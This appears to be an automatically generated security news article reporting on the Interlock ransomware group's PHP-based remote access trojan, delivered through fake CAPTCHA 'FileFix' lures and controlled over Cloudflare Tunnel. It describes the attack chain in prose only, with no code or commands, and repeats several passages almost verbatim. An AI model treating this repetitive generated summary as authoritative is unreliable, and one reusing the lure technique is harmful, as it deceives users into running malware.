Ethical Hacking News
The Interlock ransomware group has unveiled a new PHP-based Remote Access Trojan (RAT) via FileFix, marking a significant shift in their tactics. The malware spreads through compromised websites using fake CAPTCHA checks and exploits Windows File Explorer's address bar to trick users into executing commands. This development highlights the continued evolution of the Interlock group's tooling and their operational sophistication.
The Interlock ransomware group has deployed a new PHP-based Remote Access Trojan (RAT) via the FileFix delivery mechanism. The malware uses a web scripting language to gain access to victim networks, marking a significant shift in its tactics. The RAT spreads via compromised websites using hidden scripts that prompt victims through fake CAPTCHA checks to run a PowerShell script. The PHP version executes through PowerShell, launching a PHP binary from an unusual path and using a custom config file. The malware performs system reconnaissance, checks its privilege level, and exfiltrates system info in JSON format. The Interlock RAT establishes a command and control channel with the attackers' infrastructure, leveraging the legitimate Cloudflare Tunnel service to mask its location. The malware supports commands to download and run executables or DLLs, execute arbitrary shell commands, set up persistence via registry keys, and shut itself down.
The Interlock ransomware group, known for its sophisticated and targeted attacks against various industries, has recently deployed a new PHP-based Remote Access Trojan (RAT) via the FileFix delivery mechanism. This development marks a significant shift in the group's tactics, as it now utilizes a web scripting language to gain access to victim networks.
According to researchers from the DFIR Report, in partnership with Proofpoint, the Interlock RAT uses a delivery method known as FileFix, a variant of ClickFix, to target multiple industries. The malware spreads via compromised websites using hidden scripts that prompt victims through fake CAPTCHA checks to run a PowerShell script. Both PHP and Node.js variants have been seen, with the PHP version emerging in June.
The campaign begins with compromised websites injected with a single-line script hidden in the page's HTML, often unbeknownst to site owners or visitors. The linked JavaScript employs heavy IP filtering to serve the payload, which first prompts the user to click a captcha to “Verify you are human” followed by “Verification steps” to open a run command and paste in from the clipboard. If pasted into the run command it will execute a PowerShell script which eventually leads to Interlock RAT.
The PHP version executes through PowerShell, launching a PHP binary from an unusual path and using a custom config file. FileFix, an evolution of ClickFix, exploits Windows File Explorer’s address bar to trick users into executing commands. Once installed, the Interlock RAT performs system reconnaissance, checks its privilege level (USER, ADMIN, or SYSTEM), and exfiltrates system info in JSON format.
It then connects to a remote server to download and execute EXE or DLL files. The malware conducts automated system profiling using various PowerShell commands, collecting detailed information about the system, processes, services, drives, and network. It also performs hands-on-keyboard discovery, such as querying Active Directory, user accounts, and domain controllers, showing signs of attacker interaction.
The researchers observed the malware establishing command and control via Cloudflare Tunnel (trycloudflare.com), leveraging the legitimate Cloudflare Tunnel service to mask the true location of the C2 server. The Interlock RAT establishes a robust command and control (C2) channel with the attackers' infrastructure. Notably, it leverages trycloudflare.com URLs, abusing the legitimate Cloudflare Tunnel service to mask the true location of the C2 server.
The malware also contains hardcoded fallback IP addresses, ensuring communication can be maintained even if the Cloudflare Tunnel is disrupted. Interlock RAT supports commands to download and run executables or DLLs, execute arbitrary shell commands, set up persistence via registry keys, and shut itself down. The malicious code also supports lateral movement via RDP.
This discovery highlights the continued evolution of the Interlock group's tooling and their operational sophistication. While the Node.js variant of Interlock RAT was known for its use of Node.js, this variant leverages PHP, a common web scripting language, to gain and maintain access to victim networks.
Related Information:
https://www.ethicalhackingnews.com/articles/The-Interlock-Ransomware-Group-Unveils-a-New-PHP-Based-RAT-via-FileFix-A-Sophisticated-Attack-Vector-ehn.shtml
https://securityaffairs.com/179919/cyber-crime/interlock-ransomware-group-deploys-new-php-based-rat-via-filefix.html
Published: Mon Jul 14 14:26:25 2025 by llama3.2 3B Q4_K_M
